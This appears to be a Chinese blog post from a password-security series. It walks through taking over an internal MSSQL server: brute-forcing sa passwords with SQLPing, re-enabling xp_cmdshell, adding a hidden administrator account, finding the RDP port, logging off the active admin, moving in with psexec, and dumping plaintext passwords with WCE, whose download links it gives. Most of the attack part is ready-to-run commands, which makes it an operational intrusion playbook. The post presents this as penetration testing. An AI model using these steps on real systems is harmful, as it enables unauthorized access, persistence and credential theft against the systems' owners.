百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术教程 > 正文

密码安全系列文章11:内网MSSQL服务器口令扫描及渗透

suiw9 2024-11-11 15:52 29 浏览 0 评论

在实际渗透过程中,往往通过SQL注入或者弱口令登录后台,成功获取了Webshell,但对于如何进行内网渗透相当纠结,其实在获取入口权限的情况下,通过lcx端口转发等工具,进入内网,可以通过数据库、系统账号等口令扫描来实施内网渗透。本文就介绍如何在内网中进行MSSQL口令扫描及获取服务器权限。

11.1.1使用SQLPing扫描获取mssql口令

在SQLPing程序目录,配置好passlist.txt和userlist.txt文件,如图1所示,设置扫描的IP地址及其范围,本案例是针对内网开始地址192.100.100.1,终止地址为192.100.100.254。在实际渗透测试中根据实际需要来设置扫描的IP地址,User list也是根据实际掌握情况来设置,比较常用的用户为sa。Password list根据实际收集的密码来进行扫描,如果是普通密码破解,则可以使用top 10000password这种字典,在内网中可以逐渐加强该字典,将收集到的所有用户密码全部加入。

11.1.2扫描并破解密码

如图2所示,对192.100.100.X的C段地址进行扫描,成功发现16个MSSQL实例,且暴力破解成功5个账号,红色字体表示破解成功。单击“File”菜单,可以将扫描结果保存为xml文件,然后打开文件进行查看,如图3所示。


11.1.3使用SQLTOOLS进行提权

(1)连接测试

在SQL连接设置中分别填入IP地址“192.100.100.33”,密码“lo*******”,如图4所示,单击连接,如果密码正确则会提示连接成功,然后执行”dir c:\”命令来测试是否可以执行DOS命令。

(2)查看数据库版本

在SQL命令中执行“select @@version”命令,如图5所示,获取当前数据库为SQL Server 2005.

(3)恢复xp_cmdshell存储过程

在SQL Tools中分别执行以下语句来恢复xp_cmdshell存储过程,执行效果如图6所示。

EXEC sp_configure 'show advanced options', 1;

RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

(4)获取当前权限

在DOS命令中执行“whoami”命令获取当前用户权限为系统权限(nt authority\system),如图7所示。

(5)添加管理员用户到管理组

在DOS命令中分别执行以下语句

net user siweb$ siweb /add

net localgroup administrators siweb$ /add

net localgroup administrators

来添加用户siweb$密码为siweb,并将siweb$用户添加到管理员组,最后查看管理员组用户siweb$是否添加成功,如图8,图9,图10所示。



(6)获取远程终端端口

远程终端默认端口是3389,有些情况下,无法直接端口进行扫描,则可以通过命令行来快速获取:

tasklist /svc | find " Term " 或者tasklist /svc | find " TermService "

显示结果如图11所示,其中7100表示进程号,TermService表示远程终端服务。

netstat -ano | find "7100"则表示获取进程号为7100的端口号,如图12所示。



(7)查看当前远程终端用户登录情况

如图13所示,可以使用query user /quser等命令来查看当前3389连接情况,防止发生管理员在线情况下登入服务器!使用logoff ID注销当前登录的用户。例如注销管理员显示为唱片的用户,则可以使用“logoff 1”命令。


(8)使用psexec配合wce来获取密码

执行net use \\192.100.100.33\admin$ “siweb” /user:siweb$

Psexec \\192.100.100.33 cmd

如图14所示,成功进行交互式命令提示符。

(9)获取当前系统架构

执行systeminfo | find "86"获取信息中会显示Family等字样,如图15所示,则表明该操作系统是X86系统,否则使用systeminfo | find "64"命令来获取该架构为X64架构,然后使用对应的wce等密码获取程序来获取明文或者加密的哈希值。



11.1.4登录远程终端

使用获取的密码Administrator/!XML********登录192.100.100.33服务器,如图16所示成功获取内网中一台服务器权限。

11.1.5总结与提高

(1)口令扫描,可以通过sqlping等工具对内网IP进行扫描,获取sa口令

(2)查看服务器版本,对SQL Server 2005可恢复其存储进程:

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

(3)对SQL Server 2000/2005可以查看其当前用户权限,执行whomai,如果是管理员权限,则可以通过添加用户来获取服务器权限。

net user siweb$ siweb /add

net localgroup administrators siweb$ /add

net localgroup administrators

(4)精确获取远程终端端口命令:

tasklist /svc | find "Term"

svchost.exe 7100 TermService

netstat -ano | find "7100"

(5)获取操作系统架构,便于使用合适的密码获取软件获取明文密码

systeminfo | find "86"

systeminfo | find "64"

(6)明文密码获取

Wce -w

密码hash快速破解:http://www.objectif-securite.ch/en/ophcrack.php

Wce下载地址:

http://www.ampliasecurity.com/research/wce_v1_4beta_x32.zip

http://www.ampliasecurity.com/research/wce_v1_4beta_x64.zip

http://www.ampliasecurity.com/research/wce_v1_4beta_universal.zip





相关推荐

看完这一篇数据仓库干货,终于搞懂什么是hive了

一、Hive定义Hive最早来源于FaceBook,因为FaceBook网站每天产生海量的结构化日志数据,为了对这些数据进行管理,并且因为机器学习的需求,产生了Hive这们技术,并继续发展成为一个成...

真正让你明白Hive参数调优系列1:控制map个数与性能调优参数

本系列几章系统地介绍了开发中Hive常见的用户配置属性(有时称为参数,变量或选项),并说明了哪些版本引入了哪些属性,常见有哪些属性的使用,哪些属性可以进行Hive调优,以及如何使用的问题。以及日常Hi...

HIVE SQL基础语法(hive sql是什么)

引言与关系型数据库的SQL略有不同,但支持了绝大多数的语句如DDL、DML以及常见的聚合函数、连接查询、条件查询。HIVE不适合用于联机事务处理,也不提供实时查询功能。它最适合应用在基于大量不可变数据...

[干货]Hive与Spark sql整合并测试效率

在目前的大数据架构中hive是用来做离线数据分析的,而在Spark1.4版本中spark加入了sparksql,我们知道spark的优势是速度快,那么到底sparksql会比hive...

Hive 常用的函数(hive 数学函数)

一、Hive函数概述及分类标准概述Hive内建了不少函数,用于满足用户不同使用需求,提高SQL编写效率:...

数仓/数开面试题真题总结(二)(数仓面试时应该讲些什么)

二.Hive...

Tomcat处理HTTP请求流程解析(tomcat 处理请求过程)

1、一个简单的HTTP服务器在Web应用中,浏览器请求一个URL,服务器就把生成的HTML网页发送给浏览器,而浏览器和服务器之间的传输协议是HTTP,那么接下来我们看下如何用Java来实现一个简单...

Python 高级编程之网络编程 Socket(六)

一、概述Python网络编程是指使用Python语言编写的网络应用程序。这种编程涉及到网络通信、套接字编程、协议解析等多种方面的知识。...

[904]ScalersTalk成长会Python小组第20周学习笔记

Scalers点评:在2015年,ScalersTalk成长会Python小组完成了《Python核心编程》第1轮的学习。到2016年,我们开始第二轮的学习,并且将重点放在章节的习题上。Python小...

「web开发」几款http请求测试工具

curl命令CURL(CommandLineUniformResourceLocator),是一个利用URL语法,在命令行终端下使用的网络请求工具,支持HTTP、HTTPS、FTP等协议...

x-cmd pkg | hurl - 强力的 HTTP 请求测试工具,让 API 测试更加简洁高效

简介...

Mac 基于HTTP方式访问下载共享文件,配置共享服务器

方法一:使用Python的SimpleHTTPServer进行局域网文件共享Mac自带Python,所以不需要安装其他软件,一条命令即可...

Python 基础教程十五之 Python 使用requests库发送http请求

前言...

使用curl进行http高并发访问(php curl 大量并发获得结果)

本文主要介绍curl异步接口的使用方式,以及获取高性能的一些思路和实践。同时假设读者已经熟悉并且使用过同步接口。1.curl接口基本介绍curl一共有三种接口:EasyInterface...

Django 中的 HttpResponse理解和用法-基础篇1

思路是方向,代码是时间,知识需积累,经验需摸索。希望对大家有用,有错误还望指出。...

取消回复欢迎 发表评论: